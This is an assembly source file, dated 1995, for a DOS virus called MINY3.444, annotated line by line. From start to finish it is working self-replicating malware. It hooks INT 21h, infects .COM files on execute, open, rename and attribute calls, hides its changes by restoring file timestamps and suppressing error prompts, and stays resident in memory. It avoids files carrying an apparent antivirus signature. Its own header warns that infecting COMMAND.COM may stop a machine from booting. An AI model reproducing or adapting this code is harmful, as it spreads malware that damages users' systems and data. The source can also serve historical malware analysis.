Assembly Source File  |  1995-06-01  |  10KB  |  297 lines

  1. ;******************************************************************************
  2. ;*                                                                            *
  3. ;*        MINY3.444   Virus                                                   *
  4. ;*                                                                            *
  5. ;*     Version 444: faster infection; infects on file open etc., not only on  *
  6. ;*     execute. However, COMMAND.COM is still infected too, so boot may fail. *
  7. ;*                                                                            *
  8. ;******************************************************************************
  9.  
  10.  PARASIZE      EQU     (TVirEND - Start + 0Fh) SHR 4 ; size of the in-memory image in 16-byte paragraphs, rounded up
  11.  
  12.  
  13.  VIRUS    SEGMENT PARA 'VIRUS'
  14.           ASSUME CS:VIRUS, DS:VIRUS
  15.  
  16.  Start:                                      ; program entry point (named by "end Start")
  17.           mov     BP,100h                    ; BP = offset this code runs at; the imm16 is rewritten per file by "mov word ptr Start+1,ax"
  18.           NOP
  19.           JMP     ChkVirinMEM                ; continue at the memory-residency check
  20.           NOP
  21.           DB      'SVS!'                     ; author tag per the original comment; fixed bytes usable as a scan string
  22.  
  23.  NewInt21:                                   ; replacement INT 21h handler: filters file-related DOS calls
  24.           Pushf
  25.           xchg   ah,al                       ; swap AH/AL so the function number is in AL
  26.           cmp    al,4Bh                      ; 4Bh (EXEC)?
  27.           jz     Push_All                    ; yes: take the file-handling path
  28.           cmp    al,3Dh                      ; 3Dh (open)?
  29.           jz     Push_All
  30.           cmp    al,43h                      ; 43h (get/set attributes)?
  31.           jz     Push_All
  32.           cmp    al,56h                      ; 56h (rename, e.g. REN)?
  33.           jz     Push_All
  34.           cmp    al,6ch                      ; 6Ch (extended open)?
  35.           jz     Push_All
  36.           cmp    AX,034F0h                   ; caller's AX was F034h: the "already resident?" query
  37.           jnz    J_Int21
  38.           Popf
  39.           xor    ax,ax                       ; answer AX=0000 (a resident copy is present)
  40.           IRET
  41.  
  42.  J_Int21:                                    ; pass the call on to the original INT 21h handler
  43.           xchg    ah,al                      ; undo the AH/AL swap done on entry
  44.           PopF
  45.           DB      0EAh                       ; opcode of a far JMP; its 4-byte operand is OldInt21 below
  46.  OldInt21 DD      ?                          ; saved original INT 21h vector, filled in by ChkVirinMEM
  47.           DB      '/Korea'                   ; text marker (original comment: Korean-made virus); usable as a scan string
  48.  
  49.  callInt21:                                  ; call the original INT 21h directly (original comment: a plain
  50.           xchg    ah,al                      ; INT 21h would collide with this hook); callers pass AX byte-swapped
  51.           PushF                              ; emulate the flags push an INT instruction would do
  52.           call    dword ptr CS:OldInt21
  53.           RET
  54.  
  55.  Push_All:                                   ; file-name filter: continue only for names ending in .COM
  56.           Push    AX                         ; save registers (restored at Pop_All)
  57.           Push    BX
  58.           Push    CX
  59.           Push    DX
  60.           Push    DS
  61.           Push    ES
  62.           Push    SI
  63.           Push    DI
  64.  
  65.           cmp     al,6ch                     ; was this the extended-open call (6Ch)?
  66.           jnz     ChkEXTisCOM
  67.           cmp     dl,01                      ; open-mode check: only DL=01 is handled
  68.           jnz     JumpExit
  69.           mov     dx,si                      ; 6Ch passes the file name pointer in SI
  70.  ChkEXTisCOM:                                ; scan the name for its extension
  71.           mov     si,dx                      ; SI = file name pointer
  72.  Loop_Zero:
  73.           lodsb
  74.           cmp     al,00                      ; end of file name?
  75.           jz      JumpExit
  76.           cmp     al,'.'                     ; extension separator?
  77.           jnz     Loop_Zero
  78.           lodsw
  79.           and     ax,0DFDFh                  ; clear bit 5 of both bytes (force upper case)
  80.           cmp     ax,'OC'                    ; first two extension characters "CO"?
  81.           jnz     JumpExit
  82.           lodsb
  83.           and     al,0DFh
  84.           cmp     al,'M'                     ; third extension character "M"?
  85.           jz      SetInt24h                  ; extension is COM: go on to the file routine
  86.  JumpExit:
  87.           Jmp     Pop_all                    ; anything else: restore registers and chain
  88.  
  89.  SetInt24h:                                  ; .COM file modification routine; INT 24h is replaced while it runs
  90.           mov     bx,ds                      ; keep caller's DS; take over INT 24h (critical error)
  91.           xor     ax,ax
  92.           mov     ds,ax
  93.           Push    DS:[0090h]                 ; save old INT 24h vector (offset)
  94.           Push    DS:[0092h]                 ; save old INT 24h vector (segment)
  95.           mov     word ptr DS:[0090h],offset NewInt24
  96.           mov     word ptr DS:[0092h],cs
  97.  
  98.           mov     ds,bx                      ; get file attributes (callInt21 swaps AX to 4300h)
  99.           mov     ax,0043h
  100.           call    callInt21
  101.           Push    CX                         ; CX = attributes, saved for Restore_Old
  102.           Push    DX                         ; DS:DX = file name pointer
  103.           Push    DS
  104.  
  105.           MOV     AX,0143h                   ; set attributes to 0 (read/write) - becomes 4301h
  106.           xor     cx,cx
  107.           call    callInt21
  108.           jnc     Open_File
  109.           JMP     Restore_old
  110.  Open_File:
  111.           mov     ax,023dh                   ; open the file, mode 02 - becomes 3D02h
  112.           call    callInt21
  113.           jc      Restore_Old
  114.  
  115.           push    cs                         ; cs=ds=es
  116.           pop     ds
  117.           Push    cs
  118.           pop     es
  119.           xchg    bx,ax                      ; BX = file handle
  120.  
  121.  Read_File:
  122.           mov     ah,3Fh                     ; read the first 4 bytes into Org4bytes
  123.           mov     dx,offset Org4bytes
  124.           mov     si,dx
  125.           mov     cx,0004h
  126.           int     21h
  127.  
  128.  ChkEXEFile:
  129.           cmp     byte ptr [SI],'M'          ; first byte 'M' (EXE header)? then skip the file
  130.           jz      Close_File
  131.  
  132.  ChkFSize:
  133.           cmp     byte ptr [SI+3],34h        ; 4th byte 34h = already-infected marker; skip
  134.           jz      Close_File
  135.  
  136.           mov     di,offset V3_Str           ; skip files whose first 4 bytes equal V3_Str ("V3 file" per original comment)
  137.           mov     cx,0004
  138.           repz    cmpsb
  139.           jz      Close_file
  140.  
  141.           mov     al,02h                     ; seek to end of file; AX = size (low word)
  142.           call    Set_Pnt
  143.  
  144.           cmp     ax,1234                    ; smaller than 1234 bytes? skip
  145.           jb      Close_File
  146.           cmp     ax,65000                   ; larger than 65000 bytes? skip
  147.           ja      Close_File
  148.  
  149.           Push    AX
  150.           add     AX,0100h
  151.           mov     word ptr Start+1,ax        ; patch the imm16 of "mov BP,100h" with size+100h
  152.           Pop     AX
  153.           sub     ax,0003                    ; JMP displacement = size - 3
  154.           mov     word ptr FileHead+1,ax
  155.           mov     byte ptr FileHead+3,34h    ; 4th header byte = 34h, the marker tested at ChkFSize
  156.  
  157.           mov     ax,5700h                   ; get the file's date/time
  158.           Push    AX
  159.           Int     21h
  160.           Push    CX
  161.           Push    DX
  162.  
  163.           mov     ah,40h                     ; write "offset VirEND" bytes from DS:0000 at the end of the file
  164.           xor     dx,dx
  165.           mov     cx, offset VirEND
  166.           Int     21h
  167.  
  168.           mov     al,00h                     ; seek back to the start of the file
  169.           call    Set_Pnt
  170.  
  171.           mov     ah,40h                     ; overwrite the first 4 bytes with FileHead (JMP + marker)
  172.           mov     dx, offset FileHead
  173.           mov     cx,0004h
  174.           Int     21h
  175.  
  176.           Pop     dx
  177.           Pop     CX
  178.           Pop     AX
  179.           Inc     AL                         ; AX=5701h
  180.           Int     21h                        ; restore the original date/time, so the timestamp does not reveal the change
  181.  
  182.  Close_File:                                 ; close the file
  183.           mov     ah,3eh
  184.           Int     21h
  185.  
  186.  Restore_Old:                                ; undo the temporary changes
  187.           Pop     DS                         ; restore the saved file attributes
  188.           Pop     DX
  189.           pop     CX
  190.           mov     ax,0143h
  191.           Call    callInt21
  192.  
  193.           xor     ax,ax                      ; restore the original INT 24h vector
  194.           mov     ds,ax
  195.           POP     DS:[0092h]
  196.           POP     DS:[0090h]
  197.  
  198.  Pop_All:                                    ; restore the registers saved at Push_All, then chain
  199.           Pop     DI
  200.           Pop     si
  201.           Pop     ES
  202.           Pop     ds
  203.           Pop     dx
  204.           Pop     cx
  205.           Pop     bx
  206.           Pop     ax
  207.           Jmp     J_Int21                    ; let the original INT 21h handler service the request
  208.  
  209. ;********************************************
  210. ;    Memory-resident part
  211. ;
  212.  
  213.  ChkVirinMEM:                                ; residency check, then install; lowers the memory size fields by PARASIZE paragraphs
  214.           mov     AH,34h                     ; AX=F034h / INT 21h (after the xchg below):
  215.           mov     AL,0F0h                    ; AX=0 on return means a copy is already in memory
  216.           xchg    ah,al
  217.           Int     21h                        ;
  218.           or      ax,ax                      ;
  219.           jz      Restart_COM                ; already resident: just run the host
  220.  
  221.           xor     bx,bx                      ; BX=0000
  222.           mov     ds,bx                      ; DS = 0000 to read the INT 21h vector at 0000:0084h
  223.           mov     si,0083h
  224.           lea     DI,SS:[BP+OldInt21]        ; DI = run-time offset of OldInt21
  225.           Inc     SI                         ; SI = 0084h
  226.           cld
  227.           movsw                              ; copy vector offset from 0000:0084
  228.  
  229.           Push    cs                         ; CS=AX
  230.           Pop     AX
  231.           movsw                              ; copy vector segment from 0000:0086
  232.           Push    cs                         ; CS=DS
  233.           Pop     ds
  234.  
  235.           mov     CX, PARASIZE               ; CX = paragraphs to reserve
  236.           dec     ax
  237.           mov     ds,ax                      ; DS = CS-1 (presumably the memory control block of this program - assumes CS is the PSP)
  238.           Inc     BL                         ; BX=0001
  239.           cmp     byte ptr DS:[BX-1],'Z'     ; byte at DS:0000 must be 'Z', else give up
  240.           jnz     Restart_COM
  241.  
  242.           sub     word ptr [BX+02],CX        ; lower the word at DS:0003 by PARASIZE
  243.           sub     word ptr [BX+11h],CX       ; lower the word at DS:0012 (= CS:0002) by PARASIZE
  244.           mov     ES,word ptr [BX+11h]       ; ES = that lowered segment: destination of the copy
  245.  
  246.           Push    cs                         ; copy the code image to ES:0000
  247.           Pop     ds
  248.           mov     si,BP
  249.           xor     di,di
  250.           mov     cx, offset TVirEND
  251.           repz    movsb
  252.  
  253.           mov     ds,cx                      ; CX is 0 after the copy: DS = 0000; redirect INT 21h
  254.           cli
  255.           mov     word ptr [BX+85h],es       ; 0000:0086 = segment of the copy
  256.           mov     word ptr [BX+83h],offset NewInt21 ; 0000:0084 = offset of the new handler
  257.           sti
  258.  
  259.  Restart_COM:                                ; put back the host's first 4 bytes and run it
  260.           mov     si,BP
  261.  
  262.           push    cs
  263.           pop     ds
  264.           push    cs                         ; ds=es
  265.           pop     es
  266.  
  267.           add     si,offset Org4bytes        ; SI = run-time address of the saved host bytes
  268.           mov     di,00FFh
  269.           Inc     di                         ; DI = 0100h; the first 4 bytes are restored there
  270.           push    di                         ; 0100h becomes the return address for the RET below
  271.           movsw
  272.           movsw
  273.           RET                                ; continue at CS:0100h
  274.  
  275.  Org4bytes        db 90h,90h,0cdh,20h         ; host's original first 4 bytes (initial value: NOP, NOP, INT 20h)
  276.  
  277.  Set_Pnt:                                    ; INT 21h/42h seek with offset 0; AL = origin set by the caller, BX = handle
  278.           mov     ah,42h
  279.           xor     cx,cx                      ; CX:DX = offset 0
  280.           xor     dx,dx
  281.           Int     21h
  282.           RET
  283.  
  284.  NewInt24:                                   ; temporary INT 24h handler: keeps critical errors from surfacing
  285.           xor     al,al                      ; return AL=0
  286.           IRET
  287.  
  288.           DB      '[Miny3]'                  ; name string; fixed bytes usable as a scan string
  289.  V3_Str   DB      0EBh,13h,73h,43h           ; 4-byte pattern compared with a file's first bytes ("V3" identification string per original comment)
  290.  FileHead DB      0E9h                       ; near JMP opcode: first byte of the 4-byte replacement header
  291.  VirEND:                                     ; end of the part written to files
  292.           DB      ?,?,?                      ; rest of the header: JMP displacement (2 bytes) + marker byte
  293.  TVirEND:                                    ; end of the in-memory image (used by PARASIZE)
  294.  
  295.  VIRUS    ENDS
  296.           end     Start
  297.